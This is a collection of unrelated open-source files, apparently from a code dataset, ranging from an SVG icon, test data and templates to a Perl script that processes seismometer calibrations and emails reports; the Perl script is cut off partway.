<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 20 20" height="20" viewBox="0 0 20 20" width="20"><rect fill="none" height="20" width="20"/><path d="M10,10.25h3v1.5h-3V14l-3-3l3-3V10.25z M16.5,6H10L8,4H3.5C2.67,4,2,4.67,2,5.5v9C2,15.33,2.67,16,3.5,16h13 c0.83,0,1.5-0.67,1.5-1.5v-7C18,6.67,17.33,6,16.5,6z"/></svg>
SVG
2
Imudassir77/material-design-icons
src/file/drive_file_move_rtl/materialicons/20px.svg
[ "Apache-2.0" ]
%!PS-Adobe-3.0 Resource-Encoding %%Title: VIM-cp1254 %%Version: 1.0 0 %%EndComments /VIM-cp1254[ /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /.notdef /space /exclam /quotedbl /numbersign /dollar /percent /ampersand /quotesingle /parenleft /parenright /asterisk /plus /comma /minus /period /slash /zero /one /two /three /four /five /six /seven /eight /nine /colon /semicolon /less /equal /greater /question /at /A /B /C /D /E /F /G /H /I /J /K /L /M /N /O /P /Q /R /S /T /U /V /W /X /Y /Z /bracketleft /backslash /bracketright /asciicircum /underscore /grave /a /b /c /d /e /f /g /h /i /j /k /l /m /n /o /p /q /r /s /t /u /v /w /x /y /z /braceleft /bar /braceright /asciitilde /.notdef /Euro /.notdef /quotesinglbase /florin /quotedblbase /ellipsis /dagger /daggerdbl /circumflex /perthousand /Scaron /guilsinglleft /OE /.notdef /Zcaron /.notdef /.notdef /quoteleft /quoteright /quotedblleft /quotedblright /bullet /endash /emdash /tilde /trademark /scaron /guilsinglright /oe /.notdef /zcaron /Ydieresis /space /exclamdown /cent /sterling /currency /yen /brokenbar /section /dieresis /copyright /ordfeminine /guillemotleft /logicalnot /hyphen /registered /macron /degree /plusminus /twosuperior /threesuperior /acute /mu /paragraph /periodcentered /cedilla /onesuperior /ordmasculine /guillemotright /onequarter /onehalf /threequarters /questiondown /Agrave /Aacute /Acircumflex /Atilde /Adieresis /Aring /AE /Ccedilla /Egrave /Eacute /Ecircumflex /Edieresis /Igrave /Iacute /Icircumflex /Idieresis /Gbreve /Ntilde /Ograve /Oacute /Ocircumflex /Otilde /Odieresis /multiply /Oslash /Ugrave /Uacute /Ucircumflex /Udieresis /Idotaccent /Scedilla /germandbls /agrave /aacute /acircumflex /atilde /adieresis /aring /ae /ccedilla /egrave /eacute /ecircumflex /edieresis /igrave /iacute /icircumflex /idieresis /gbreve /ntilde /ograve /oacute /ocircumflex /otilde /odieresis /divide /oslash /ugrave /uacute /ucircumflex /udieresis /dotlessi /scedilla /ydieresis] /Encoding defineresource pop % vim:ff=unix: %%EOF
PostScript
1
uga-rosa/neovim
runtime/print/cp1254.ps
[ "Vim" ]
*** Settings *** Library ArgumentsPython Library Annotations.py Library ../libdoc/Decorators.py *** Variables *** @{LIST} With three values *** Test Cases *** Correct Number Of Arguments When No Defaults Or Varargs ${ret} = A 0 Should Be Equal ${ret} a_0 ${ret} = A 1 my arg Should Be Equal ${ret} a_1: my arg ${ret} = A 3 a1 a2 a3 Should Be Equal ${ret} a_3: a1 a2 a3 Too Few Arguments When No Defaults Or Varargs 1 [Documentation] FAIL Keyword 'ArgumentsPython.A 1' expected 1 argument, got 0. A 1 Too Few Arguments When No Defaults Or Varargs 2 [Documentation] FAIL Keyword 'ArgumentsPython.A 3' expected 3 arguments, got 2. A 3 a1 a2 Too Many Arguments When No Defaults Or Varargs 1 [Documentation] FAIL Keyword 'ArgumentsPython.A 0' expected 0 arguments, got 10. A 0 This is too much ! Really ... way too much !!!!! Too Many Arguments When No Defaults Or Varargs 2 [Documentation] FAIL Keyword 'ArgumentsPython.A 1' expected 1 argument, got 2. A 1 Too much Too Many Arguments When No Defaults Or Varargs 3 [Documentation] FAIL Keyword 'ArgumentsPython.A 3' expected 3 arguments, got 4. A 3 a1 a2 a3 a4 Correct Number Of Arguments With Defaults ${ret} = A 0 1 Should Be Equal ${ret} a_0_1: default ${ret} = A 0 1 This works too Should Be Equal ${ret} a_0_1: This works too ${ret} = A 1 3 My argument Should Be Equal ${ret} a_1_3: My argument default default ${ret} = A 1 3 My argument My argument 2 Should Be Equal ${ret} a_1_3: My argument My argument 2 default ${ret} = A 1 3 My argument My argument 2 My argument 3 Should Be Equal ${ret} a_1_3: My argument My argument 2 My argument 3 Too Few Arguments With Defaults [Documentation] FAIL Keyword 'ArgumentsPython.A 1 3' expected 1 to 3 arguments, got 0. A 1 3 Too Many Arguments With Defaults 1 [Documentation] FAIL Keyword 'ArgumentsPython.A 0 1' expected 0 to 1 arguments, got 2. A 0 1 Too much Too Many Arguments With Defaults 2 [Documentation] FAIL Keyword 'ArgumentsPython.A 1 3' expected 1 to 3 arguments, got 4. A 1 3 This is too much Correct Number Of Arguments With Varargs ${ret} = A 0 N Should Be Equal ${ret} a_0_n: \ ${ret} = A 0 N My arg Should Be Equal ${ret} a_0_n: My arg ${ret} = A 0 N 1 2 3 4 Should Be Equal ${ret} a_0_n: 1 2 3 4 ${ret} = A 1 N Required arg Should Be Equal ${ret} a_1_n: Required arg \ ${ret} = A 1 N 1 (req) 2 3 4 5 ... 6 7 8 9 Should Be Equal ${ret} a_1_n: 1 (req) 2 3 4 5 6 7 8 9 Too Few Arguments With Varargs [Documentation] FAIL Keyword 'ArgumentsPython.A 1 N' expected at least 1 argument, got 0. A 1 N Correct Number Of Arguments With Defaults And Varargs ${ret} = A 1 2 N Required arg Should Be Equal ${ret} a_1_2_n: Required arg default \ ${ret} = A 1 2 N one (req) two three four Should Be Equal ${ret} a_1_2_n: one (req) two three four Too Few Arguments With Defaults And Varargs [Documentation] FAIL Keyword 'ArgumentsPython.A 1 2 N' expected at least 1 argument, got 0. A 1 2 N Calling Using List Variables [Documentation] FAIL Keyword 'ArgumentsPython.A 0 1' expected 0 to 1 arguments, got 3. A 0 @{EMPTY} A 1 @{EMPTY} arg A 3 @{LIST} A 1 3 @{LIST} A 3 @{LIST} @{EMPTY} A 0 1 @{LIST} @{EMPTY} Calling Using Annotations ${ret}= Annotations one two_type_str Should Be Equal ${ret} annotations: one two_type_str Calling Using Annotations With Defaults ${ret}= Annotations With Defaults one Should Be Equal ${ret} annotations: one default Dummy decorator does not preserve arguments 1 Keyword using decorator foo bar zap Dummy decorator does not preserve arguments 2 [Documentation] FAIL STARTS: TypeError: Keyword using decorator argument mismatch is not detected Decorator using functools.wraps preserves arguments [Documentation] FAIL Keyword 'Decorators.Keyword Using Decorator With Wraps' expected 2 to 3 arguments, got 4. Keyword using decorator with wraps foo bar zap Keyword using decorator with wraps argument mismatch is detected
RobotFramework
4
rdagum/robotframework
atest/testdata/keywords/python_arguments.robot
[ "ECL-2.0", "Apache-2.0" ]
body{ background:#fafafa; font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;color:#333} .hero-unit{margin:50px auto 0;width:300px;font-size:18px;font-weight:200;line-height:30px;background-color:#eee;border-radius:6px;padding:60px} .hero-unit h1{font-size:60px;line-height:1;letter-spacing:-1px} .browsehappy{margin:.2em 0;background:#ccc;color:#000;padding:.2em 0}
CSS
4
henryqdineen/RxJS
examples/pacman-unicode/main.css
[ "Apache-2.0" ]
/*!40101 SET NAMES binary*/; INSERT INTO `bigint` VALUES (-9223372036854775808), (-8863313628261308831), (-192707003722069405), (0), (5714455538631204570), (9223372036854775807);
SQL
1
cuishuang/tidb
br/tests/lightning_various_types/data/vt.bigint.0.sql
[ "Apache-2.0" ]
{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.Internal.Core Description : Core Unicorn components. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Defines core Unicorn components. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Core where import Control.Monad import Control.Monad.Trans.Except (ExceptT) import Foreign {# context lib = "unicorn" #} #include <unicorn/unicorn.h> #include "unicorn_wrapper.h" -- | The Unicorn engine. {# pointer *uc_engine as Engine foreign finalizer uc_close_wrapper as close newtype #} -- | A pointer to a Unicorn engine. {# pointer *uc_engine as EnginePtr -> Engine #} -- | Make a new Unicorn engine out of an engine pointer. The returned Unicorn -- engine will automatically call 'uc_close_wrapper' when it goes out of scope. mkEngine :: EnginePtr -> IO Engine mkEngine ptr = liftM Engine (newForeignPtr close ptr) -- | Errors encountered by the Unicorn API. These values are returned by -- 'errno'. {# enum uc_err as Error { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | The emulator runs in the IO monad and allows for the handling of errors -- "under the hood". type Emulator a = ExceptT Error IO a -- | An architecture-dependent register. class Enum a => Reg a
C2hs Haskell
5
clayne/unicorn_pe
unicorn/bindings/haskell/src/Unicorn/Internal/Core.chs
[ "MIT" ]
<%inherit file="/base.mako"/> <%namespace file="/message.mako" import="render_msg" /> <br/><br/> <ul class="manage-table-actions"> <li> <a class="action-button" href="${h.url_for( controller='user', action='index', cntrller=cntrller )}">User preferences</a> </li> </ul> %if message: ${render_msg( message, status )} %endif <div class="toolForm"> <div class="toolFormTitle">Web API Key</div> <div class="toolFormBody"> <form name="user_api_keys" id="user_api_keys" action="${h.url_for( controller='user', action='api_keys', cntrller=cntrller )}" method="post" > <div class="form-row"> <label>Current API key:</label> %if user.api_keys: ${user.api_keys[0].key} %else: none set %endif </div> <div class="form-row"> <input type="submit" name="new_api_key_button" value="Generate a new key now"/> %if user.api_keys: (invalidates old key) %endif <div class="toolParamHelp" style="clear: both;"> <% if trans.webapp.name == 'galaxy': webapp_str = 'Galaxy' else: webapp_str = 'the Tool Shed' %> An API key will allow you to access ${webapp_str} via its web API. Please note that <strong>this key acts as an alternate means to access your account and should be treated with the same care as your login password</strong>. </div> </div> </form> </div> </div>
Mako
4
rikeshi/galaxy
lib/tool_shed/webapp/templates/webapps/tool_shed/user/api_keys.mako
[ "CC-BY-3.0" ]
<%doc>formatting.myt - Provides section formatting elements, syntax-highlighted code blocks, and other special filters.</%doc> <%global> import string, re import highlight </%global> <%method section> <%doc>Main section formatting element.</%doc> <%args> toc path description=None onepage=False </%args> <%init> item = toc.get_by_path(path) if item is None: raise "path: " + path </%init> <A name="<% item.path %>"></a> <div class="subsection" style="margin-left:<% repr(item.depth * 10) %>px;"> <%python> content = m.content() re2 = re.compile(r"'''PYESC(.+?)PYESC'''", re.S) content = re2.sub(lambda m: m.group(1), content) </%python> % if item.depth > 1: <h3><% description or item.description %></h3> % <div class="sectiontext"> <% content %> </div> % if onepage or item.depth > 1: % if (item.next and item.next.depth >= item.depth): <a href="#<% item.get_page_root().path %>" class="toclink">back to section top</a> % % else: <a href="#<% item.get_page_root().path %>" class="toclink">back to section top</a> <& nav.myt:pagenav, item=item, onepage=onepage &> % </div> </%method> <%method formatplain> <%filter> import re f = re.sub(r'\n[\s\t]*\n[\s\t]*', '</p>\n<p>', f) f = "<p>" + f + "</p>" return f </%filter> <% m.content() | h%> </%method> <%method codeline trim="both"> <span class="codeline"><% m.content() %></span> </%method> <%method code autoflush=False> <%args> title = None syntaxtype = 'python' html_escape = False use_sliders = False </%args> <%init> def fix_indent(f): f =string.expandtabs(f, 4) g = '' lines = string.split(f, "\n") whitespace = None for line in lines: if whitespace is None: match = re.match(r"^([ ]*).+", line) if match is not None: whitespace = match.group(1) if whitespace is not None: line = re.sub(r"^%s" % whitespace, "", line) if whitespace is not None or re.search(r"\w", line) is not None: g += (line + "\n") return g.rstrip() p = re.compile(r'<pre>(.*?)</pre>', re.S) def hlight(match): return "<pre>" + highlight.highlight(fix_indent(match.group(1)), html_escape = html_escape, syntaxtype = syntaxtype) + "</pre>" content = p.sub(hlight, "<pre>" + m.content() + "</pre>") </%init> <div class="<% use_sliders and "sliding_code" or "code" %>"> % if title is not None: <div class="codetitle"><% title %></div> % <% content %></div> </%method> <%method popboxlink trim="both"> <%args> name=None show='show' hide='hide' </%args> <%init> if name is None: name = m.attributes.setdefault('popbox_name', 0) name += 1 m.attributes['popbox_name'] = name name = "popbox_" + repr(name) </%init> javascript:togglePopbox('<% name %>', '<% show %>', '<% hide %>') </%method> <%method popbox trim="both"> <%args> name = None class_ = None </%args> <%init> if name is None: name = 'popbox_' + repr(m.attributes['popbox_name']) </%init> <div id="<% name %>_div" class="<% class_ %>" style="display:none;"><% m.content().strip() %></div> </%method> <%method poplink trim="both"> <%args> link='sql' </%args> <%init> href = m.scomp('SELF:popboxlink') </%init> '''PYESC<& nav.myt:link, href=href, text=link, class_="codepoplink" &>PYESC''' </%method> <%method codepopper trim="both"> <%init> c = m.content() c = re.sub(r'\n', '<br/>\n', c.strip()) </%init> </pre><&|SELF:popbox, class_="codepop" &><% c %></&><pre> </%method> <%method poppedcode trim="both"> <%init> c = m.content() c = re.sub(r'\n', '<br/>\n', c.strip()) </%init> </pre><div class="codepop"><% c %></div><pre> </%method>
Myghty
4
oslab-swrc/juxta
analyzer/libs/pygments/tests/examplefiles/test.myt
[ "MIT" ]
require("stringio") WIDTH = 60 Last = 42; A = 3877; C = 29573; M = 139968 def rand: max { Last = (Last * A + C) % M return ((max * Last) / M) } ALU = "GGCCGGGCGCGGTGGCTCACGCCTGTAATCCCAGCACTTTGG" + \ "GAGGCCGAGGCGGGCGGATCACCTGAGGTCAGGAGTTCGAGA" + \ "CCAGCCTGGCCAACATGGTGAAACCCCGTCTCTACTAAAAAT" + \ "ACAAAAATTAGCCGGGCGTGGTGGCGCGCGCCTGTAATCCCA" + \ "GCTACTCGGGAGGCTGAGGCAGGAGAATCGCTTGAACCCGGG" + \ "AGGCGGAGGTTGCAGTGAGCCGAGATCGCGCCACTGCACTCC" + \ "AGCCTGGGCGACAGAGCGAGACTCCGTCTCAAAAA" class AA { # TODO: Read-write slots are less performant than manual definition (see # below for manual definition). Profile of read-write behavior is in # fasta-perf-read-write-profile.txt # read_write_slots: ['c, 'p] def initialize: tuple { @c = tuple[0]; @p = tuple[1] } def c { @c } def p { @p } def c: c { @c = c } def p: p { @p = p } } IUB = [ AA new: ("a", 0.27), AA new: ("c", 0.12), AA new: ("g", 0.12), AA new: ("t", 0.27), AA new: ("B", 0.02), AA new: ("D", 0.02), AA new: ("H", 0.02), AA new: ("K", 0.02), AA new: ("M", 0.02), AA new: ("N", 0.02), AA new: ("R", 0.02), AA new: ("S", 0.02), AA new: ("V", 0.02), AA new: ("W", 0.02), AA new: ("Y", 0.02) ] HomoSap = [ AA new: ("a", 0.3029549426680), AA new: ("c", 0.1979883004921), AA new: ("g", 0.1975473066391), AA new: ("t", 0.3015094502008) ] def make_cumulative: list { cp = 0.0 i = 0 l = list length while: { i < l } do: { item = list[i] cp = cp + (item p) item p: cp i = i + 1 } } def fasta_repeat: n seq: seq { _stdout = *stdout* # Speed up dynamic variable lookup. i = 0 lenOut = 60 s_length = seq length while: { n > 0 } do: { if: (n < lenOut) then: { lenOut = n } if: ((i + lenOut) < s_length) then: { #seq slice(i, lenOut) . println _stdout raw_write(seq slice(i, lenOut) << "\n") i = i + lenOut } else: { #seq slice(i, (s_length - i)) . print _stdout raw_write(seq slice(i, (s_length - i))) i = lenOut - (s_length - i) #seq slice(0, i) . println _stdout raw_write(seq slice(0, i) << "\n") } n = n - lenOut } } def fasta_random: count genelist: list { _stdout = *stdout* #buff = Array new: WIDTH make_cumulative: list while: { count > 0 } do: { buff = StringIO new line = WIDTH min: count pos = 0 # buff fill("") while: { pos < line } do: { Last = (Last * A + C) % M r = (Last to_f) / M i = 0 # Linear search while: { (list[i] p) < r } do: { i = i + 1 } # buff at: pos put: (list[i] c) buff pos=(pos) buff write(list[i] c) pos = pos + 1 } # _stdout raw_write(buff join: ""); _stdout raw_write("\n") _stdout raw_write(buff string()); _stdout raw_write("\n") count = count - line } }
Fancy
4
bakkdoor/fancy
tools/benchmarks/fasta2.fy
[ "BSD-3-Clause" ]
:- module(mpe,[ mpi_open/0, mpi_start/0, mpi_close/1, mpi_create_event/1, mpi_create_state/4]). :- load_foreign_files([mpe], [], init_mpe).
Prolog
2
ryandesign/yap
library/mpi/mpe.yap
[ "Artistic-1.0-Perl", "ClArtistic" ]
# # program needs: # # DONE calculate responce for each white noise calibration in dlcalwf table # DONE make sure only calculated only one time # DONE create calplot table # DONE put data in /anf/TA/products/calibrations/%sta/%sta_%chan_%time_%version.pdf # DONE email Calibration Report # # needs to be able to select calibration channels BH, HH, LH, .... # needs to select dbcalibrate.pf file # use Getopt::Std ; use strict ; use Datascope ; use archive ; use utilfunct ; our ( $opt_C, $opt_D, $opt_M, $opt_P, $opt_V, $opt_d, $opt_g, $opt_m, $opt_n, $opt_v ) ; our ( $pgm, $host ); our ( %pf, %plots, %problems ); { # Main program my ( $caldir, $cmd, $db, $problems, $stime, $subject, $usage ) ; # # Setup # $pgm = $0 ; $pgm =~ s".*/"" ; elog_init($pgm, @ARGV); $cmd = "\n$0 @ARGV" ; $problems = 0; $usage = "\n\n\nUsage: $0 \n [-v] [-V] [-n] [-C] [-P] \n" ; $usage .= " [-d calibration_directory] [-D display] [-m mail_to] [-M mail_to_field_ops] [-g]\n" ; $usage .= " db [sta_regex] \n\n" ; if ( ! getopts('CPgnvVd:D:m:M:') || @ARGV < 1 ) { elog_notify ( $cmd ) ; elog_die ( $usage ) ; } &savemail() if $opt_m ; elog_notify( $cmd ) ; $stime = strydtime( now() ); chop ($host = `uname -n` ) ; elog_notify ("\nstarting execution on $host $stime\n\n"); if (system_check(0)) { $subject = "Problems - $pgm $host Ran out of system resources" ; &sendmail($subject, $opt_m) if $opt_m ; elog_die("\n$subject") ; } # # Get options and parameters # $db = shift @ARGV; $opt_v = defined($opt_V) ? $opt_V : $opt_v ; $caldir = $opt_d || "/anf/TA/products/calibrations" ; # # check db # $problems = &check_tables($db,$problems,qw(dlcalwf dlsensor sensormodel wfdisc)); if ($problems) { $subject = "Problems - $pgm $host db $db missing tables" ; &sendmail($subject, $opt_m) if $opt_m ; elog_die("\n$subject") ; } &dbcalibrate( $db ) unless ( $opt_P ) ; # # run displayscal on all unprocessed rows in sensorcal table # &displayscal( $db, $caldir ) unless ( $opt_C ) ; prettyprint(\%plots) if $opt_V; # prettyprint(\%ENV) if $opt_V; # # send emails with plots of newly plotted stations if desired # &email( ) unless ( $opt_C ) ; # # clean up and exit # if ($opt_D) { $cmd = "vncserver.rt -kill :$opt_D" ; elog_notify( $cmd ) ; $problems = run($cmd,$problems) unless $opt_n ; } $stime = strydtime(now()); elog_notify ("\ncompleted successfully $stime\n\n"); $subject = sprintf("Success $pgm $host"); elog_notify ($subject); &sendmail ( $subject, $opt_m ) if $opt_m ; exit(0); } sub dbcalibrate { # &dbcalibrate( $db ) ; my ( $db ) = @_ ; my ( $cmd, $endtime, $row, $sc_row, $sta, $start, $subset, $time ) ; my ( @cals, @db, @dbdlcalwf, @dbscrsc, @dbsensorcal ) ; my ( %guralp ) ; # # open db # @db = dbopen( $db, 'r+' ) ; @dbdlcalwf = dblookup( @db, 0, "dlcalwf", 0, 0 ) ; @dbsensorcal = dblookup( @db, 0, "sensorcal", 0, 0 ) ; @dbscrsc = dblookup( @db, 0, "sensorcal", 0, "dbSCRATCH" ) ; # # subset dlcalwf by station regular expressions. # if ( @ARGV ) { $subset = "fsta =~ /$ARGV[0]/"; elog_notify("subsetting dlcalwf by - $subset") if $opt_V; @dbdlcalwf = dbsubset(@dbdlcalwf, $subset) ; } # # subset dlcalwf to BHZ channels with white noise longer than one hour. # $subset = "fchan =~ /BHZ/ && dlcalerr =~ /ok/ && dlcaltype =~ /white/ && (endtime - time) > 3600 && snet !~ /BB/" ; elog_notify("dlcalwf subset $subset") if $opt_V ; @dbdlcalwf = dbsubset(@dbdlcalwf,$subset) ; $start = now() ; # # run dbcalibrate on all unprocessed calibrations # for ($row=0; $row < dbquery(@dbdlcalwf,"dbRECORD_COUNT") ; $row++ ) { $dbdlcalwf[3] = $row ; ($sta,$time,$endtime) = dbgetv(@dbdlcalwf,"fsta","time","endtime" ) ; dbputv(@dbscrsc,"sta", $sta, "chan", "BHZ", "time", $time, "endtime", $endtime ) ; @cals = dbmatches( @dbscrsc, @dbsensorcal, "processed", "sta", "chan", "time::endtime" ) ; if ($#cals > -1) { elog_notify( sprintf("Already processed $sta %s %s", strydtime($time), strydtime($endtime) ) ) if $opt_v ; next ; } $cmd = "dbcalibrate -v -dlcalwf_sifter \"fsta =~ /$sta/ && fchan =~ /BH./ && " ; $cmd .= "time < _" . strydtime( $endtime ) . "_ && endtime > _" . strydtime( $time ) ; $cmd .= "_ && dlcaltype =~ /white/ \" -out $db $db " ; $cmd .= " > /tmp/dbcalibrate 2>&1 " ; if ( ! run_cmd( $cmd ) ) { $cmd = "cat /tmp/dbcalibrate" ; run_cmd( $cmd ) ; } } dbclose(@db); @db = dbopen( $db, 'r+' ) ; @dbsensorcal = dblookup( @db, 0, "sensorcal", 0, 0 ) ; @dbsensorcal = dbsubset( @dbsensorcal, "lddate > $start && chan =~ /BHN|BHE/ && snmodel =~ /cmg3t/ " ) ; for ( $dbsensorcal[3] = 0 ; $dbsensorcal[3] < dbquery(@dbsensorcal,"dbRECORD_COUNT") ; $dbsensorcal[3]++ ) { dbputv ( @dbsensorcal, "sngen", ( 1500.0/1402.7) * (dbgetv ( @dbsensorcal, "sngen" ) ) ) ; } dbclose( @db ); return ; } sub displayscal { # &displayscal( $db, $caldir ) ; my ( $db, $caldir ) = @_ ; my ( $chan, $cmd, $dlcaltype, $dlident, $dlmodel, $endtime, $pdfdir, $pdffile ) ; my ( $pdffull, $psfile, $rchan, $row, $rsptype, $sngen, $snident, $snmodel, $sta, $subset ) ; my ( $time ) ; my ( @db, @dbcalplot, @dbscrplot, @dbsensorcal, @plts ) ; # # open db # @db = dbopen( $db, 'r+' ) ; @dbsensorcal = dblookup( @db, 0, "sensorcal", 0, 0 ) ; @dbcalplot = dblookup( @db, 0, "calplot", 0, 0 ) ; @dbscrplot = dblookup( @db, 0, "calplot", 0, "dbSCRATCH" ) ; # # subset sensorcal by station regular expressions. # if ( @ARGV ) { $subset = "sta =~ /$ARGV[0]/" ; elog_notify("subsetting sensorcal by - $subset") if $opt_V ; } for ($row=0; $row < dbquery(@dbsensorcal,"dbRECORD_COUNT") ; $row++ ) { $dbsensorcal[3] = $row ; ( $sta, $chan, $time, $endtime, $dlcaltype, $dlmodel, $dlident, $snmodel, $snident, $sngen, $rsptype, $rchan ) = dbgetv( @dbsensorcal, "sta", "chan", "time", "endtime", "dlcaltype", "dlmodel", "dlident", "snmodel", "snident", "sngen", "rsptype", "rchan" ) ; # # do not subset sensorcal table since the actual row number is needed by displayscals # dbputv( @dbscrplot, "sta", $sta, "chan", $chan, "time", $time, "endtime", $endtime ) ; elog_notify( sprintf( "\nsensorcal %s %s %s %s", $sta, $chan, strydtime( $time ), strydtime( $endtime ) ) ) if $opt_V; @plts = dbmatches( @dbscrplot, @dbcalplot, "plot", "sta", "chan", "time::endtime" ); if ($#plts > -1) { elog_notify( sprintf( "Already plotted $sta $chan %s %s", strydtime( $time ), strydtime( $endtime ) ) ) if $opt_v; next ; } $pdfdir = "$caldir/$sta" ; makedir( $pdfdir) if ( ! -e $pdfdir); $pdffile = "$sta\_$chan\_"; $pdffile .= epoch2str($time,"%Y-%j-%H-%M"); $pdffile .= ".pdf" ; $psfile = $pdffile ; $psfile =~ s/\.pdf/\.ps/; $pdffull = $pdfdir . "/" . $pdffile; if (-e $pdffull ) { elog_notify( "$pdffull already exists" ); next; } # # load up most recent info from sensorcal table # $plots{$sta}{$chan}{time} = $time ; $plots{$sta}{$chan}{duration} = $endtime - $time ; $plots{$sta}{$chan}{pdffull} = $pdffull ; $plots{$sta}{$chan}{dlcaltype} = $dlcaltype ; $plots{$sta}{$chan}{dlmodel} = $dlmodel ; $plots{$sta}{$chan}{dlident} = $dlident ; $plots{$sta}{$chan}{snmodel} = $snmodel ; $plots{$sta}{$chan}{snident} = $snident ; $plots{$sta}{$chan}{sngen} = $sngen ; $plots{$sta}{$chan}{rsptype} = $rsptype ; $plots{$sta}{$chan}{rchan} = $rchan ; # # build plots # $cmd = "displayscal -dumpandexit $psfile $db $row" ; run_cmd ( $cmd ) ; sleep 1 ; if ( -s $psfile > 50000 ) { $cmd = "ps2pdf14 $psfile $pdffull" ; run_cmd ( $cmd ) ; $cmd = "rm $psfile"; run_cmd ( $cmd ) ; dbaddv( @dbcalplot, "sta", $sta, "chan", $chan, "time", $time, "endtime", $endtime, "dir", $pdfdir, "dfile", $pdffile ) unless $opt_n; } # # identify problems # if ($chan =~ /BHZ/ && $snmodel =~ /sts2.*|cmg3t/ && ($sngen < 1350 || $sngen > 1650)) { $plots{$sta}{problem} = 1; $problems{$sta}{$chan}{$time}{time} = $time; $problems{$sta}{$chan}{$time}{duration} = $endtime - $time; $problems{$sta}{$chan}{$time}{pdffull} = $pdffull; $problems{$sta}{$chan}{$time}{dlcaltype} = $dlcaltype; $problems{$sta}{$chan}{$time}{dlmodel} = $dlmodel; $problems{$sta}{$chan}{$time}{dlident} = $dlident; $problems{$sta}{$chan}{$time}{snmodel} = $snmodel; $problems{$sta}{$chan}{$time}{snident} = $snident; $problems{$sta}{$chan}{$time}{sngen} = $sngen; $problems{$sta}{$chan}{$time}{rsptype} = $rsptype; $problems{$sta}{$chan}{$time}{rchan} = $rchan; $problems{$sta}{$chan}{$time}{error} = "sensor gain > 1650 || sensor gain < 1350" ; } if ($chan =~ /BHZ/ && $snmodel =~ /trillium.*/ && ($sngen < 1050 || $sngen > 1350)) { $plots{$sta}{problem} = 1; $problems{$sta}{$chan}{$time}{time} = $time; $problems{$sta}{$chan}{$time}{duration} = $endtime - $time; $problems{$sta}{$chan}{$time}{pdffull} = $pdffull; $problems{$sta}{$chan}{$time}{dlcaltype} = $dlcaltype; $problems{$sta}{$chan}{$time}{dlmodel} = $dlmodel; $problems{$sta}{$chan}{$time}{dlident} = $dlident; $problems{$sta}{$chan}{$time}{snmodel} = $snmodel; $problems{$sta}{$chan}{$time}{snident} = $snident; $problems{$sta}{$chan}{$time}{sngen} = $sngen; $problems{$sta}{$chan}{$time}{rsptype} = $rsptype; $problems{$sta}{$chan}{$time}{rchan} = $rchan; $problems{$sta}{$chan}{$time}{error} = "sensor gain > 1650 || sensor gain < 1350" ; } if ($chan =~ /BH[NE]/ && $snmodel =~ /cmg3t/ && ($sngen < 1250 || $sngen > 1550)) { $plots{$sta}{problem} = 1; $problems{$sta}{$chan}{$time}{time} = $time; $problems{$sta}{$chan}{$time}{duration} = $endtime - $time; $problems{$sta}{$chan}{$time}{pdffull} = $pdffull; $problems{$sta}{$chan}{$time}{dlcaltype} = $dlcaltype; $problems{$sta}{$chan}{$time}{dlmodel} = $dlmodel; $problems{$sta}{$chan}{$time}{dlident} = $dlident; $problems{$sta}{$chan}{$time}{snmodel} = $snmodel; $problems{$sta}{$chan}{$time}{snident} = $snident; $problems{$sta}{$chan}{$time}{sngen} = $sngen; $problems{$sta}{$chan}{$time}{rsptype} = $rsptype; $problems{$sta}{$chan}{$time}{rchan} = $rchan; $problems{$sta}{$chan}{$time}{error} = "sensor gain > 1550 || sensor gain < 1250" ; } if ($chan =~ /BH[NE]/ && $snmodel =~ /sts2.*|trillium.*/ && $sngen > 75) { $plots{$sta}{problem} = 1; $problems{$sta}{$chan}{$time}{time} = $time; $problems{$sta}{$chan}{$time}{duration} = $endtime - $time; $problems{$sta}{$chan}{$time}{pdffull} = $pdffull; $problems{$sta}{$chan}{$time}{dlcaltype} = $dlcaltype; $problems{$sta}{$chan}{$time}{dlmodel} = $dlmodel; $problems{$sta}{$chan}{$time}{dlident} = $dlident; $problems{$sta}{$chan}{$time}{snmodel} = $snmodel; $problems{$sta}{$chan}{$time}{snident} = $snident; $problems{$sta}{$chan}{$time}{sngen} = $sngen; $problems{$sta}{$chan}{$time}{rsptype} = $rsptype; $problems{$sta}{$chan}{$time}{rchan} = $rchan; $problems{$sta}{$chan}{$time}{error} = "sensor gain > 75" ; } } dbclose(@db); } sub email { # &email( ) ; my ( $cmd, $sta, $string, $time ) ; my ( @newdata ) ; @newdata = sort ( keys ( %plots ) ) ; foreach $sta (@newdata) { elog_notify ($sta) if $opt_V; unless (exists $plots{$sta}{BHZ}{time}) { $string = "Calibration data does not exist for $sta BHZ"; elog_complain($string); next; } unless (exists $plots{$sta}{BHN}{time}) { $string = "Calibration data does not exist for $sta BHN"; elog_complain($string); next; } unless (exists $plots{$sta}{BHE}{time}) { $string = "Calibration data does not exist for $sta BHE"; elog_complain($string); next; } open (CAL, ">/tmp/cal" ); print CAL "US Array Calibration Sequence Report\nForm V2.0\n\n"; print CAL "Station Code $sta\n\n"; if (exists $plots{$sta}{problem}) { if (exists $problems{$sta}{BHZ}) { printf CAL "BHZ Calibration Problem info\n"; foreach $time (keys %{ $problems{$sta}{BHZ} }) { print CAL "Datalogger $plots{$sta}{BHZ}{dlmodel} $plots{$sta}{BHZ}{dlident} "; print CAL "Sensor $plots{$sta}{BHZ}{snmodel} $plots{$sta}{BHZ}{snident}\n"; printf CAL "%s type - %s duration - %d refchan - %s response type - %s\n", strydtime($time), $problems{$sta}{BHZ}{$time}{dlcaltype}, $problems{$sta}{BHZ}{$time}{duration}, $problems{$sta}{BHZ}{$time}{rchan}, $problems{$sta}{BHZ}{$time}{rsptype}; printf CAL "Sensor gains BHZ %6d <- failed test \"%s\"\n\n", $problems{$sta}{BHZ}{$time}{sngen} , $problems{$sta}{BHZ}{$time}{error}; $cmd .= "-a $problems{$sta}{BHZ}{$time}{pdffull} "; } } else { printf CAL "BHZ Calibration info\n"; print CAL "Datalogger 